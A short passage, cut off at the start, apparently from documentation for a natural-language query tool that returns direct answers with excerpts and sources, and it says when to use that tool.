natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.